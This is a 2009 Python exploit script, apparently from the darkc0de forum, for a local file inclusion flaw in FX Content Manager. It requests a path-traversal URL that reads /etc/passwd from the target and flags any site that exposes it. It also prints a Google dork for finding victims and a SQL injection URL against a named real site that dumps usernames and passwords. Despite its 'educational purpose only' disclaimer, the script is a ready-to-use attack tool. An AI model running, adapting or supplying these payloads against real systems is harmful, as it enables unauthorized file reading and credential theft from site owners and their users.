FX Content Manager local file inclusion exploit.
1061b4d4ed08591eb7477e11122172d9f63a2785a6da5bff507ef452c11f5b1a
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
################################################################
#
# LFI bug found by marcoj (www.x0rg.net) and r0ot (www.x0rg.net)
#
# Sql injection on www.reversedelta.co.uk and CMS name found by me :)
#
import sys, os, time, urllib2, re
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearint = 'cls'
os.system(clearing)
if len(sys.argv) !=2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Example: fxcms.py http://www.site.com/ |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site + "/"
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] CMS --> FXContentManager"
print "\n[+] Google dork : inurl:/fxmodules/"
print "\n[+] Home: http://www.reversedelta.co.uk"
print "\n[+] Portfolio: http://www.reversedelta.co.uk/page.php?id=28&parent_id=3"
print "\n[+] Also vulnerable on sql injection :)"
print """\t[!] http://www.reversedelta.co.uk/page.php?id=4&parent_id=2+and+1=2+union+all+select+0,1,concat_ws(char(58),username,password),3,4,5,6,7,8,9,10,11,12,13+from+users--"""
print "\n[+] Lets search for lfi bug :)"
print "\n[+] Target:",site
print "\n[+] Check if vulnerable ..."
print
try:
target = urllib2.urlopen(site+"fxmodules/page.php?page=../../../../etc/passwd").read()
if re.findall("root:x:", target):
print "[!] Site is vulnerable "
print
print "*"*95
print "\t"+site+"fxmodules/page.php?page=../../../../etc/passwd"
print "*"*95
print
else:
print "\t[-] Sorry, this site is not vulnerable"
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
print "\n[-] %s" % time.strftime("%X")